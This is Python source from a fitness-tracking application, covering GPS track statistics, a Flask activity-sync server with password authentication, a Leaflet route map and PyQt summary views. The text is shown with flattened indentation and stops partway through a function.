def calculate_speed(self):
"""Calculate speeds at each point."""
speeds = []
for point_index in range(len(self)):
relevant_points = get_nearby_indices(
len(self), point_index, number=SPEED_RANGE
)
time_diff = (
self["time"][relevant_points[-1]] - self["time"][relevant_points[0]]
).total_seconds()
distance = sum(
self["dist_to_last"][p]
for p in relevant_points[1:]
if self["dist_to_last"][p] is not None
)
if time_diff:
speeds.append(distance / time_diff)
elif speeds:
speeds.append(speeds[-1])
else:
speeds.append(0)
self["speed"] = speeds
def calculate_height_change(self):
"""Calculate differences in elevation between adjacent points."""
self.fields["height_change"] = [None] + [y - x for x, y in pairs(self["ele"])]
def calculate_vertical_speed(self):
"""Calculate vertical speed at each point."""
self.fields["vertical_speed"] = [None]
for point in range(1, len(self)):
height_change = self["height_change"][point]
time = self["time"][point]
last_time = self["time"][point - 1]
if None in {height_change, time, last_time}:
self.fields["vertical_speed"].append(None)
else:
self.fields["vertical_speed"].append(
height_change / (time - last_time).total_seconds()
)
def calculate_gradient(self):
"""Calculate the gradient at each point."""
self.fields["gradient"] = [None]
for dist, height_change in list(
zip(self["dist_to_last"], self["height_change"])
)[1:]:
self.fields["gradient"].append(
None if dist in {None, 0} else height_change / dist
)
def calculate_angle(self):
"""Calculate the angle of inclination at each point."""
self.fields["angle"] = [
None if g is None else math.atan(g) for g in self["gradient"]
]
def __len__(self):
return len(next(iter(self.fields.values())))
@lru_cache(128)
def without_nones(self, field):
return [v for v in self[field] if v is not None]
@lru_cache(128)
def average(self, field):
"""Get the mean value of a field, ignoring missing values."""
if field == "speed":
return self.length / self.elapsed_time.total_seconds()
valid = list(self.without_nones(field))
return sum(valid) / len(valid)
@lru_cache(128)
def maximum(self, field):
"""Get the maximum value of a field, ignoring missing values."""
return max(self.without_nones(field))
# Caching necessary to avoid fake elevation data
@property
@lru_cache(128)
def has_altitude_data(self):
return "ele" in self.fields
@property
@lru_cache(128)
def has_position_data(self):
return "lat" in self.fields and "lon" in self.fields
@property
@lru_cache(128)
def lat_lon_list(self):
return [[x, y] for x, y in zip(self["lat"], self["lon"])]
def part_lat_lon_list(self, min_dist, max_dist):
track = []
for dist, lat, lon in zip(self["dist"], self["lat"], self["lon"]):
if dist is None or dist < min_dist:
continue
if dist >= max_dist:
return track
track.append([lat, lon])
return track
@property
@lru_cache(128)
def ascent(self):
if self.has_altitude_data:
return sum(self.without_nones("climb"))
@property
@lru_cache(128)
def descent(self):
if self.has_altitude_data:
return sum(self.without_nones("desc"))
@property
def start_time(self):
return self["time"][0]
@property
@lru_cache(128)
def elapsed_time(self) -> timedelta:
end_time = self["time"][-1]
return end_time - self.start_time
@property
@lru_cache(128)
def moving_time(self) -> timedelta:
total_time = timedelta(0)
last_distance = 0
last_time = self.start_time
for distance, time in zip(self["dist"][1:], self["time"][1:]):
if distance is None:
continue
time_difference = time - last_time
if not time_difference:
continue
distance_difference = distance - last_distance
if distance_difference < 1:
continue
if distance_difference / time_difference.total_seconds() > 0.2:
total_time += time_difference
elif distance < last_distance:
                raise ValueError("Distance decreased")
last_distance = distance
last_time = time
return total_time
@property
@lru_cache(128)
def average_speed_moving(self):
return self.length / self.moving_time.total_seconds()
@property
@lru_cache(128)
def distance_in_days(self) -> dict:
if self.start_time.date() == self["time"][-1].date():
return {self.start_time.date(): self.length}
last_time = self.start_time
last_date = last_time.date()
totals = {last_date: 0}
for dist_to_last, time in zip(self["dist_to_last"][1:], self["time"][1:]):
if dist_to_last is None:
continue
date = time.date()
if date == last_date:
totals[last_date] += dist_to_last
else:
speed = dist_to_last / (time - last_time).total_seconds()
totals[last_date] += (
speed * (times.end_of(last_time, "day") - last_time).total_seconds()
)
for days in range(1, (date - last_date).days):
day = last_date + timedelta(days)
                    totals[day] = speed * timedelta(days=1).total_seconds()
totals[date] = (
speed * (time - times.start_of(time, "day")).total_seconds()
)
last_date = date
last_time = time
return totals
def lat_lng_from_distance(self, distance):
distances = self.without_nones("dist")
point0 = bisect.bisect(distances, distance)
try:
point1 = next(
i for i, d in enumerate_from(distances, point0) if d > distance
)
except StopIteration:
return None
point0 -= 1
dist0 = distances[point0]
dist1 = distances[point1]
lat0 = self["lat"][point0]
lon0 = self["lon"][point0]
if dist0 == dist1:
return (lat0, lon0)
lat1 = self["lat"][point1]
lon1 = self["lon"][point1]
ratio = (distance - dist0) / (dist1 - dist0)
return (lerp(lat0, lat1, ratio), lerp(lon0, lon1, ratio))
def graph(self, y_data, x_data="dist") -> tuple:
"""Get x and y data as (data, dimension) tuples."""
return (
(self[x_data], FIELD_DIMENSIONS[x_data]),
(self[y_data], FIELD_DIMENSIONS[y_data]),
)
@property
def length(self):
return next(x for x in reversed(self["dist"]) if x is not None)
def splits(self, splitlength=1000) -> list:
"""
Split an activity into splits, with per-split data.
Each split is a list in the format
[lap, split, speed, net climb, total climb].
"""
splits = []
lasttime = None
lastalt = None
total_climb = 0
for time, distance, alt, climb in zip(
self["time"], self["dist"], self["ele"], self["climb"]
):
if lasttime is None:
lasttime = time
lastalt = alt
if distance is None:
continue
if distance // splitlength > len(splits):
speed = splitlength / (time - lasttime).total_seconds()
splits.append(
[
DimensionValue(time - lasttime, "time"),
DimensionValue(time - self.start_time, "time"),
DimensionValue(speed, "speed"),
DimensionValue(alt - lastalt, "altitude"),
DimensionValue(total_climb, "altitude"),
]
)
total_climb = 0
lasttime = None
if climb is not None:
total_climb += climb
return splits
def get_zone_durations(self, zones, field="speed", count_field="time"):
"""
Get durations for the zones graph.
Between all zones values, calculate the total amount of
count_field at each point where field is within the range given
by that pair of zones values. The zones must be sorted in
ascending order.
"""
buckets = {z: 0 for z in zones}
for point in range(len(self)):
# Work out the amount of count_field at the point
nearby_points = get_nearby_indices(len(self), point)
duration = (
self[count_field][nearby_points[-1]]
- self[count_field][nearby_points[0]]
) / 2
duration = times.to_number(duration)
# Add it to the correct bucket
value = self[field][point]
if value is None:
continue
for zone in zones[::-1]:
if value > zone:
buckets[zone] += duration
break
return buckets
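    # Illustrative behaviour of get_zone_durations (sample numbers only):
    # with zones=[0, 2, 4] interpreted as speeds in m/s and field="speed",
    # a point travelling at 3.1 m/s adds its share of count_field to
    # buckets[2], a point at 5.0 m/s adds to buckets[4], and points below
    # zones[0] are ignored.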
def get_curve(self, table_distances):
"""Get the curve and curve table for an activity."""
table_distances = [x for x in table_distances if x <= self.length][::-1]
time_values = [t.timestamp() for t in self["time"]]
bests = []
point_indices = []
for distance in table_distances:
last_point = next(
i for i, d in enumerate(self["dist"]) if d is not None and d > distance
)
best = time_values[last_point] - self.start_time.timestamp()
first_point = 0
point = (first_point, last_point)
for last_point, last_dist in enumerate_from(self["dist"], last_point + 1):
if last_dist is None:
continue
last_good_first_point = first_point
for first_point, first_dist in enumerate_from(
self["dist"], first_point
):
if first_dist is None:
continue
if last_dist - first_dist >= distance:
last_good_first_point = first_point
else:
break
first_point = last_good_first_point
time_taken = time_values[last_point] - time_values[first_point]
if time_taken < best:
best = time_taken
point = (first_point, last_point)
bests.append(best)
point_indices.append(point)
if best == self.temporal_resolution:
break
while len(point_indices) < len(table_distances):
point_indices.append(point_indices[-1])
bests.append(bests[-1])
point_indices = point_indices[::-1]
bests = bests[::-1]
table_distances = table_distances[::-1]
speeds = [
distance / time if time else 0
for distance, time in zip(table_distances, bests)
]
bests_table = [
(
DimensionValue(distance, "distance"),
DimensionValue(timedelta(seconds=time), "time"),
DimensionValue(speed, "speed"),
)
for distance, time, speed in zip(table_distances, bests, speeds)
]
return (
bests_table,
((table_distances, "distance"), (speeds, "speed")),
point_indices,
)
def match(self, other, tolerance=40):
return (
dtw(self.xyz, other.xyz, distance_only=True).normalizedDistance < tolerance
)
def max_point(self, stat):
point = None
maximum = float("-inf")
for index, value in enumerate(self[stat]):
if value is not None and value > maximum:
maximum = value
point = index
return point
@property
def save_data(self):
return {
key: value for key, value in self.fields.items() if key not in NON_SAVED
        }


# ----- end of activate/track.py -----
import hashlib
import json
import sqlite3
from base64 import b64decode, b64encode
from datetime import timedelta
from functools import wraps
from pathlib import Path
from uuid import UUID
import pkg_resources
from flask import Flask, abort, g, request
from activate import activity, serialise
DATA_DIR = Path("/var/lib/activate")
USERS_FILE = DATA_DIR / "users.json"
app = Flask(__name__)
ACTIVITIES_DIR = DATA_DIR / "activities"
ACTIVITIES_DIR.mkdir(parents=True, exist_ok=True)
ACTIVITIES_DATABASE_PATH = DATA_DIR / "activities.sqlite"
sqlite3.register_converter("DICT", serialise.loads)
sqlite3.register_adapter(dict, serialise.dumps)
sqlite3.register_converter(
"TIMEDELTA", lambda d: timedelta(seconds=float(d) if b"." in d else int(d))
)
sqlite3.register_adapter(timedelta, lambda d: d.total_seconds())
sqlite3.register_converter("UUID", lambda u: UUID(u.decode("utf-8")))
sqlite3.register_adapter(UUID, str)
def add_row(database, table: str, values: dict):
"""Add a row to an SQLite database."""
database.execute(
f"INSERT INTO {table} ({', '.join(values)})"
f" VALUES ({', '.join(f':{v}' for v in values)})",
values,
)
def get_row(database, table: str, values: dict):
"""Find a row in an SQLite database."""
return database.execute(
f"SELECT * FROM {table} WHERE {' AND '.join(f'{v} = :{v}' for v in values)}",
values,
).fetchone()
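# Illustrative example of the SQL these helpers build (the table and column
# names below are placeholders used only for demonstration):
#
#     add_row(db, "activities", {"name": "x"})
#     # INSERT INTO activities (name) VALUES (:name)
#
#     get_row(db, "activities", {"activity_id": some_id})
#     # SELECT * FROM activities WHERE activity_id = :activity_id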
def delete_by_id(activities, activity_id):
"""Delete a row with a given activity_id."""
activities.execute(
"DELETE FROM activities WHERE activity_id = ?", [str(activity_id)]
)
def reset_activities():
"""Generate a blank activities database."""
db = load_database()
db.executescript(
pkg_resources.resource_string("activate.resources", "init.sql").decode("utf-8")
)
db.commit()
def load_database():
db = sqlite3.connect(
ACTIVITIES_DATABASE_PATH,
detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES,
)
db.row_factory = sqlite3.Row
return db
def get_activities():
if "db" not in g:
g.db = load_database()
return g.db
@app.teardown_appcontext
def close_activities(e=None):
db = g.pop("db", None)
if db is not None:
db.close()
def get_users():
try:
with open(USERS_FILE) as f:
return json.load(f)
except FileNotFoundError:
return {}
def save_users():
with open(USERS_FILE, "w") as f:
        json.dump(users, f)
def password_hash(password: str, salt):
return b64encode(
hashlib.scrypt(
password.encode("utf-8"), salt=b64decode(salt), n=16384, r=8, p=1
)
).decode("utf-8")
def verify_request():
"""Check username and password against the database."""
if request.authorization is None:
return False
username = request.authorization["username"]
if username not in users:
return False
password = request.authorization["password"]
return (
password_hash(password, users[username]["salt"])
== users[username]["password_hash"]
)
def requires_auth(function):
@wraps(function)
def new_function(*args, **kwargs):
if not verify_request():
abort(403)
return function(*args, **kwargs)
return new_function
@app.route("/")
def index():
return "This is an Activate server."
@app.route("/api/send_activity", methods=["POST"])
@requires_auth
def upload():
data = serialise.loads(request.form["activity"])
data["username"] = request.authorization["username"]
new_activity = activity.Activity(**data)
activities = get_activities()
delete_by_id(activities, new_activity.activity_id)
add_row(
activities,
"activities",
{
"name": new_activity.name,
"sport": new_activity.sport,
"flags": new_activity.flags,
"effort_level": new_activity.effort_level,
"start_time": new_activity.start_time,
"distance": new_activity.distance,
"duration": new_activity.track.elapsed_time,
"climb": new_activity.track.ascent,
"activity_id": new_activity.activity_id,
"username": new_activity.username,
},
)
new_activity.save(ACTIVITIES_DIR)
activities.commit()
return "DONE"
@app.route("/api/delete_activity/<string:activity_id>")
@requires_auth
def delete_activity(activity_id):
activity_id = UUID(activity_id)
activities = get_activities()
    row = get_row(activities, "activities", {"activity_id": activity_id})
    if row is None:
        abort(404)
    if row["username"] != request.authorization["username"]:
        abort(403)
delete_by_id(activities, activity_id)
activities.commit()
return "DONE"
@app.route("/api/get_activities")
@requires_auth
def get_list():
activities = get_activities()
activities = activities.execute("SELECT * FROM activities").fetchall()
return serialise.dump_bytes([{k: a[k] for k in a.keys()} for a in activities])
@app.route("/api/get_activity/<string:activity_id>")
@requires_auth
def get_activity(activity_id):
activity_id = UUID(activity_id)
activities = get_activities()
    if get_row(activities, "activities", {"activity_id": activity_id}) is None:
        abort(404)
    try:
        with open(ACTIVITIES_DIR / f"{activity_id}.json.gz", "rb") as f:
            return f.read()
    except FileNotFoundError:
        abort(404)
users = get_users()
if not ACTIVITIES_DATABASE_PATH.exists():
    reset_activities()


# ----- end of activate/server/__init__.py -----
from contextlib import suppress
from PyQt5 import QtWidgets
import pyqtlet
from PyQt5.QtCore import Qt
from pyqtlet import L
def get_bounds(*routes):
"""Find the area of the map."""
return [
[min(p[0] for r in routes for p in r), min(p[1] for r in routes for p in r)],
[max(p[0] for r in routes for p in r), max(p[1] for r in routes for p in r)],
]
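# Illustrative example for get_bounds (coordinates are made up):
#
#     get_bounds([[51.0, -0.1], [51.5, 0.2], [51.2, 0.0]])
#     # [[51.0, -0.1], [51.5, 0.2]]
#
# i.e. the south-west and north-east corners of the smallest box that
# contains every point of every route.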
DEFAULT_POS = [53, -1]
ACTIVATE_COLOUR = "#802090"
def js_string(obj):
if obj is None:
return "null"
if isinstance(obj, bool):
return "true" if obj else "false"
if isinstance(obj, (list, tuple, set)):
return f"[{','.join(js_string(i) for i in obj)}]"
if isinstance(obj, dict):
return (
"{"
f"{','.join(f'{js_string(k)}:{js_string(v)}' for k, v in obj.items())}"
"}"
)
return repr(obj)
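# Illustrative conversions for js_string (sample values only):
#
#     js_string(True)           # 'true'
#     js_string([53, -1])       # '[53,-1]'
#     js_string({"radius": 5})  # "{'radius':5}"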
class Js:
def __init__(self, obj):
self.obj = obj
def __getattr__(self, name):
def method(*args):
self.obj.runJavaScript(
f"{self.obj.jsName}.{name}({','.join(js_string(x) for x in args)});"
)
return method
class Polyline(L.polyline):
def setLatLngs(self, coordinates):
Js(self).setLatLngs(coordinates)
class CircleMarker(L.circleMarker):
def setLatLng(self, coordinates):
Js(self).setLatLng(coordinates)
class Map(pyqtlet.MapWidget):
def __init__(self, parent, settings):
super().__init__()
self._page.profile().setHttpUserAgent("Activate")
self.settings = settings
size_policy = self.sizePolicy()
size_policy.setRetainSizeWhenHidden(True)
self.setSizePolicy(size_policy)
self.setContextMenuPolicy(Qt.NoContextMenu)
self.map = L.map(self)
if settings.tiles is None:
L.tileLayer(
"http://{s}.tile.osm.org/{z}/{x}/{y}.png",
{"attribution": "© OpenStreetMap contributors"},
).addTo(self.map)
else:
L.tileLayer(settings.tiles, {"attribution": ""}).addTo(self.map)
self.map.runJavaScript(f"{self.map.jsName}.attributionControl.setPrefix('');")
self.moved = False
def fit_bounds(self, bounds):
if self.moved:
Js(self.map).flyToBounds(
bounds,
{"duration": self.settings.map_speed}
if self.settings.map_speed > 0
else {},
)
else:
Js(self.map).fitBounds(bounds)
self.moved = True
class MapWidget(Map):
"""A map for displaying a route or heatmap."""
    def __init__(self, parent, settings):
        super().__init__(parent, settings)
self.route_lines = []
self.start_icon = CircleMarker(DEFAULT_POS, {"radius": 8, "color": "#10b020"})
self.finish_icon = CircleMarker(DEFAULT_POS, {"radius": 8, "color": "#e00000"})
self.marker = CircleMarker(DEFAULT_POS, {"radius": 5, "color": ACTIVATE_COLOUR})
self.highlight_section = self.add_route_line(self.highlight_colour)
self.mode = None
def resizeEvent(self, event):
super().resizeEvent(event)
QtWidgets.qApp.processEvents()
with suppress(AttributeError):
self.fit_bounds(self.bounds)
def show_route(self, route: list):
"""Display a list of points on the map."""
self.bounds = get_bounds(route)
self.fit_bounds(self.bounds)
if self.mode != "route":
self.clear_route_lines()
self.route_lines = [self.add_route_line()]
self.route_lines[0].setLatLngs(route)
self.start_icon.setLatLng(route[0])
self.finish_icon.setLatLng(route[-1])
self.start_icon.addTo(self.map)
self.finish_icon.addTo(self.map)
self.mode = "route"
def show_heatmap(self, routes: list):
"""Display lists of points on the map as a heatmap."""
if not routes:
return
colour = ACTIVATE_COLOUR + hex(min(round(1000 / (len(routes) ** 0.5)), 255))[2:]
self.bounds = get_bounds(*routes)
self.fit_bounds(self.bounds)
self.start_icon.removeFrom(self.map)
self.finish_icon.removeFrom(self.map)
self.clear_route_lines()
self.route_lines = []
for route in routes:
self.route_lines.append(self.add_route_line(colour))
self.route_lines[-1].setLatLngs(route)
self.mode = "heatmap"
def add_route_line(self, colour=ACTIVATE_COLOUR):
line = Polyline([], {"smoothFactor": 0, "color": colour})
line.addTo(self.map)
return line
def clear_route_lines(self):
while self.route_lines:
self.route_lines.pop().removeFrom(self.map)
def show_marker(self, position):
if position is None:
self.remove_marker()
return
self.marker.setLatLng(list(position))
self.marker.addTo(self.map)
def remove_marker(self):
self.marker.removeFrom(self.map)
def show_highlight(self, part):
self.highlight_section.setLatLngs(part)
self.highlight_section.addTo(self.map)
        Js(self.highlight_section).bringToFront()
def remove_highlight(self):
self.highlight_section.removeFrom(self.map)
@property
def highlight_colour(self):
        return self.palette().color(self.palette().Highlight).name()


# ----- end of activate/app/maps.py -----
import markdown
from PyQt5 import QtWidgets
from PyQt5.QtCore import pyqtSignal
from activate import activity_types, times
from activate.app import charts, photos
from activate.app.ui.activity_view import Ui_activity_view
class ActivityView(QtWidgets.QWidget, Ui_activity_view):
"""The statistics, graphs and map showing an activity."""
closed = pyqtSignal()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
def setup(self, unit_system, map_widget):
self.unit_system = unit_system
self.updated = set()
self.map_widget = map_widget
self.photo_list = photos.PhotoList(self)
self.overview_tab_layout.addWidget(self.photo_list)
for table in (self.split_table, self.info_table, self.curve_table):
table.set_units(self.unit_system)
table.setMouseTracking(True)
self.info_table.cellEntered.connect(self.show_stat_point)
self.split_table.cellEntered.connect(self.show_split)
self.curve_table.cellEntered.connect(self.show_fastest)
# Set up charts
self.charts = charts.LineChartSet(self.unit_system, self.graphs_layout)
self.charts.add("ele", area=True)
self.charts.add("speed")
self.charts.add("heartrate")
self.charts.add("cadence")
self.charts.add("power")
for chart in self.charts.charts.values():
chart.widget.mouse_moved.connect(self.show_marker)
self.zones_chart = charts.Histogram([0], self.zones_graph, self.unit_system)
self.curve_chart = charts.LineChart(
self.curve_graph,
self.unit_system,
area=True,
vertical_ticks=12,
horizontal_log=True,
)
def update_splits(self, data):
"""Update the activity splits page."""
self.split_table.update_data(data)
def switch_to_summary(self):
"""Update labels, map and data box."""
self.activity_name_label.setText(self.activity.name)
self.flags_label.setText(" | ".join(self.activity.active_flags))
self.description_label.setText(markdown.markdown(self.activity.description))
self.date_time_label.setText(times.nice(self.activity.start_time))
self.activity_type_label.setText(self.activity.sport)
self.info_table.update_data(self.activity.stats)
if self.activity.track.has_position_data:
self.map_widget.setVisible(True)
self.map_widget.show_route(self.activity.track.lat_lon_list)
self.show_map()
else:
self.map_widget.setVisible(False)
self.photo_list.show_activity_photos(self.activity)
def switch_to_data(self):
"""Update charts."""
if self.activity.track.has_altitude_data:
self.charts.update_show("ele", [self.activity.track.graph("ele")])
else:
self.charts.hide("ele")
self.charts.update_show("speed", [self.activity.track.graph("speed")])
if "heartrate" in self.activity.track:
self.charts.update_show(
"heartrate", [self.activity.track.graph("heartrate")]
)
else:
self.charts.hide("heartrate")
if "cadence" in self.activity.track:
self.charts.update_show("cadence", [self.activity.track.graph("cadence")])
else:
self.charts.hide("cadence")
if "power" in self.activity.track:
self.charts.update_show("power", [self.activity.track.graph("power")])
else:
self.charts.hide("power")
def switch_to_splits(self):
self.update_splits(
self.activity.track.splits(
splitlength=self.unit_system.units["distance"].size
)
)
def switch_to_zones(self):
zones = (
activity_types.ZONES[self.activity.sport]
if self.activity.sport in activity_types.ZONES
else activity_types.ZONES[None]
)
zones = [self.unit_system.decode(x, "speed") for x in zones]
self.zones_chart.set_zones(zones)
self.zones_chart.update(self.activity.track.get_zone_durations(zones))
@property
def good_distances(self):
return (
activity_types.SPECIAL_DISTANCES[self.activity.sport]
if self.activity.sport in activity_types.SPECIAL_DISTANCES
else activity_types.SPECIAL_DISTANCES[None]
)
def switch_to_curve(self):
table, graph, self.fastest_indices = self.activity.track.get_curve(
self.good_distances
)
self.curve_chart.update([graph])
self.curve_table.update_data(list(self.good_distances.values()), table)
def update_page(self, page):
"""Switch to a new activity tab page."""
if page in self.updated:
return
(
self.switch_to_summary,
self.switch_to_data,
self.switch_to_splits,
self.switch_to_zones,
self.switch_to_curve,
)[page]()
self.updated.add(page)
def force_update_page(self, page):
"""Update a page even if it already appears up to date."""
if page in self.updated:
self.updated.remove(page)
self.update_page(page)
def show_activity(self, new_activity):
"""Display a new activity."""
self.activity = new_activity
self.setWindowTitle(f"Analysing {self.activity.name}")
if self.activity.track.manual:
self.activity_tabs.setCurrentIndex(0)
for page in range(1, 5):
self.activity_tabs.setTabEnabled(page, not self.activity.track.manual)
# Previously generated pages need refreshing
self.updated = set()
self.update_page(self.activity_tabs.currentIndex())
def show_map(self):
"""
Take back the map widget.
This is necessary because the map widget must be shared between
all layouts, and a widget cannot be in multiple places at once.
Call this when the activity view becomes visible.
"""
self.map_container.addWidget(self.map_widget)
def show_marker(self, values):
self.map_widget.remove_highlight()
distance = values.x()
self.charts.show_line(distance)
distance = self.unit_system.decode(distance, "distance")
point = self.activity.track.lat_lng_from_distance(distance)
self.map_widget.show_marker(point)
def show_split(self, split, _):
self.map_widget.remove_marker()
self.map_widget.show_highlight(
self.activity.track.part_lat_lon_list(
self.unit_system.decode(split, "distance"),
self.unit_system.decode(split + 1, "distance"),
)
)
def show_fastest(self, row, _):
self.curve_chart.set_vertical_line(
self.unit_system.encode(list(self.good_distances)[row], "distance")
)
self.map_widget.remove_marker()
section = self.fastest_indices[row]
self.map_widget.show_highlight(
self.activity.track.lat_lon_list[section[0] : section[1]]
)
def show_stat_point(self, stat, _):
stat = self.info_table.get_row_text(stat)[0]
self.map_widget.remove_highlight()
try:
stat = {"Max. Speed": "speed", "Highest Point": "ele"}[stat]
except KeyError:
self.map_widget.remove_marker()
return
point = self.activity.track.max_point(stat)
self.map_widget.show_marker(self.activity.track.lat_lon_list[point])
def closeEvent(self, *args, **kwargs):
self.closed.emit()
        super().closeEvent(*args, **kwargs)


# ----- end of activate/app/activity_view.py -----
from __future__ import annotations
from typing import overload
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
Unchecked, PartiallyChecked, Checked = Qt.Unchecked, Qt.PartiallyChecked, Qt.Checked
class CheckList(QtWidgets.QListWidget):
"""A QListWidget with checkboxes on items."""
def __init__(self, *args, **kwargs):
self.do_not_recurse = False
self.all_row = False
super().__init__(*args, **kwargs)
self.itemChanged.connect(self.item_changed)
self.itemDoubleClicked.connect(self.item_double_clicked)
@overload
def __getitem__(self, index: int) -> QtWidgets.QListWidgetItem:
...
@overload
def __getitem__(self, index: slice) -> list[QtWidgets.QListWidgetItem]:
...
def __getitem__(self, index):
if isinstance(index, slice):
return [self.item(i) for i in range(len(self))[index]]
result = self.item(index)
if result is None:
raise IndexError(f"{self.__class__.__qualname__} index out of range")
return result
@property
def row_names(self):
return [row.text() for row in self]
@row_names.setter
def row_names(self, new_items):
self.clear()
self.addItems(new_items)
for row in self:
row.setCheckState(Unchecked)
@property
def states(self):
return {row.text(): row.checkState() for row in self}
@states.setter
def states(self, new_states):
for index, item in enumerate(self.row_names):
if item in new_states:
self.set_check_state(index, new_states[item])
@property
def num_states(self):
return {
row.text(): {Unchecked: 0, PartiallyChecked: 0.5, Checked: 1}[
row.checkState()
]
for row in self
}
@num_states.setter
def num_states(self, new_states):
for index, item in enumerate(self.row_names):
if item in new_states:
if new_states[item] == 0:
self.set_check_state(index, Unchecked)
elif new_states[item] == 0.5:
self.set_check_state(index, PartiallyChecked)
elif new_states[item] == 1:
self.set_check_state(index, Checked)
def get_row(self, row):
"""Get a row from a string, index or row."""
if isinstance(row, str):
for real_row in self:
if real_row.text() == row:
return real_row
raise ValueError(f"{row} is not a row.")
if isinstance(row, int):
return self[row]
return row
def set_check_state(self, row, state):
self.get_row(row).setCheckState(state)
def check_state(self, row):
return self.get_row(row).checkState()
@property
def checked_rows(self):
return [r.text() for r in self if r.checkState() == Checked]
def item_changed(self, item):
if self.do_not_recurse or not self.all_row:
return
self.stop_updates()
if self.is_all(item):
for item_ in self[1:]:
item_.setCheckState(item.checkState())
else:
states = {i.checkState() for i in self[1:]}
self.set_all_state(
next(iter(states)) if len(states) == 1 else PartiallyChecked
)
self.start_updates()
def item_double_clicked(self, item):
if self.is_all(item):
self.set_all_state(Checked)
return
self.stop_updates()
if self.all_row and len(self) > 2:
self.set_all_state(PartiallyChecked)
for item_ in self:
if not self.is_all(item_):
item_.setCheckState(Checked if item_ is item else Unchecked)
self.start_updates()
def check_all(self):
for row in self:
row.setCheckState(Checked)
def add_all_row(self):
self.insertItem(0, "All")
self.all_row = True
def is_all(self, item):
"""Check if a row is the 'All' row."""
return self.all_row and self.row(item) == 0
def set_all_state(self, state):
if self.all_row:
self.set_check_state(0, state)
def stop_updates(self):
self.do_not_recurse = True
self.blockSignals(True)
def start_updates(self):
self.do_not_recurse = False
        self.blockSignals(False)


# ----- end of activate/app/checklist.py -----
from collections import Counter
from datetime import datetime
from PyQt5 import QtWidgets
from activate import activity_types, number_formats
from activate.app import charts
from activate.app.dialogs import progress
from activate.app.ui.summary import Ui_summary
NOW = datetime.now()
class Summary(QtWidgets.QWidget, Ui_summary):
"""A widget summarising all of a person's activities."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
def setup(self, unit_system, map_widget, activities):
self.unit_system = unit_system
self.map_widget = map_widget
self.activities = activities
# This has to be added here so when the heatmap is switched to,
# the widget is already 'there', so it has a size. This lets
# fitBounds work properly.
self.heatmap_layout.addWidget(self.map_widget)
self.records_table.set_units(self.unit_system)
self.summary_period = "Year"
self.progression_chart.set_units(self.unit_system)
self.update_activity_types_list()
self.eddington_chart = charts.LineChart(
self.eddington_chart_widget,
self.unit_system,
series_count=2,
vertical_log=True,
)
self.eddington_chart.y_axis.setTitleText("Count")
self.eddington_chart.add_legend(("Done", "Target"))
def update_activity_types_list(self):
"""Set up activity types list for the summary page."""
self.activity_types_list.row_names = [
x[0] for x in Counter(a.sport for a in self.activities).most_common()
]
self.activity_types_list.add_all_row()
self.activity_types_list.check_all()
def summary_tab_switch(self):
tab = self.summary_tabs.tabText(self.summary_tabs.currentIndex())
{
"Totals": self.update_totals,
"Records": self.update_records,
"Progression": self.update_progression,
"Gallery": self.update_gallery,
"Heatmap": self.update_heatmap,
"Eddington": self.update_eddington,
}[tab]()
def update_progression(self):
"""Update the progression chart."""
self.progression_chart.update(
self.summary_period,
self.get_allowed_for_summary(),
now=NOW,
activities=self.activities,
)
def get_allowed_for_summary(self):
"""Get the allowed activity types from the checklist."""
return set(self.activity_types_list.checked_rows)
def set_formatted_number_label(self, label, value, dimension):
"""Set a label to a number, formatted with the correct units."""
label.setText(
number_formats.default_as_string(self.unit_system.format(value, dimension))
)
def update_totals(self):
"""Update the summary page totals."""
allowed_activity_types = self.get_allowed_for_summary()
allowed_activities = list(
self.activities.filtered(allowed_activity_types, self.summary_period, NOW)
)
self.set_formatted_number_label(
self.total_distance_label,
self.activities.total_distance(allowed_activities),
"distance",
)
self.set_formatted_number_label(
self.total_time_label,
self.activities.total_time(allowed_activities),
"time",
)
self.total_activities_label.setText(
str(self.activities.total_activities(allowed_activities))
)
self.set_formatted_number_label(
self.total_climb_label,
self.activities.total_climb(allowed_activities),
"altitude",
)
def update_records(self):
good_distances = {}
for sport in self.get_allowed_for_summary():
good_distances.update(
activity_types.SPECIAL_DISTANCES[sport]
if sport in activity_types.SPECIAL_DISTANCES
else activity_types.SPECIAL_DISTANCES[None]
)
good_distances = {k: good_distances[k] for k in sorted(good_distances)}
records, activity_ids = self.activities.get_records(
self.get_allowed_for_summary(),
self.summary_period,
NOW,
good_distances,
lambda x: progress(self, list(x), "Loading"),
)
try:
first_non_one_second = max(
next(
i for i, r in enumerate(records) if r[1].value.total_seconds() > 1
),
1,
)
except StopIteration:
first_non_one_second = 0
records = records[first_non_one_second - 1 :]
activity_ids = list(activity_ids)[first_non_one_second - 1 :]
good_distances = list(good_distances.values())[first_non_one_second - 1 :]
self.records_table.update_data(good_distances, records, activity_ids)
def update_gallery(self):
self.gallery.replace_photos(
self.activities.get_all_photos(
self.get_allowed_for_summary(), self.summary_period, NOW
)
)
def update_heatmap(self):
self.heatmap_layout.addWidget(self.map_widget)
self.map_widget.show_heatmap(
self.activities.get_all_routes(
self.get_allowed_for_summary(),
self.summary_period,
NOW,
lambda x: progress(self, list(x), "Loading"),
)
)
def update_eddington(self):
allowed_activities = list(
self.activities.filtered(
self.get_allowed_for_summary(), self.summary_period, NOW
)
)
if not allowed_activities:
return
unit = self.unit_system.units["distance"].size
eddington_data = self.activities.eddington(
allowed_activities, lambda x: progress(self, list(x), "Loading")
)
eddington_number = 0
for eddington_number in range(1, len(eddington_data) + 1):
if eddington_data[eddington_number - 1] <= eddington_number * unit:
break
self.total_eddington_label.setText(
f"{eddington_number} {self.unit_system.units['distance'].symbol}"
)
y_indices = list(range(1, len(eddington_data) + 1))
x_indices = [x * unit for x in y_indices[: int(eddington_data[0] / unit) + 1]]
y_indices = (y_indices, None)
self.eddington_chart.update(
(
((eddington_data, "distance"), y_indices),
((x_indices, "distance"), y_indices),
)
)
def summary_period_changed(self, value):
self.summary_period = value
        self.summary_tab_switch()


# ----- end of activate/app/summary.py -----
import dataclasses
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from activate import number_formats, times, units
from activate.app import connect
def aligned(horizontal="c", vertical="c"):
"""
Get a Qt Alignment from a string.
The first argument gives the horizontal alignment:
Left, Centre, Right or Justified.
The second argument gives the vertical alignment:
Bottom, Centre, Top or bAseline.
"""
return {
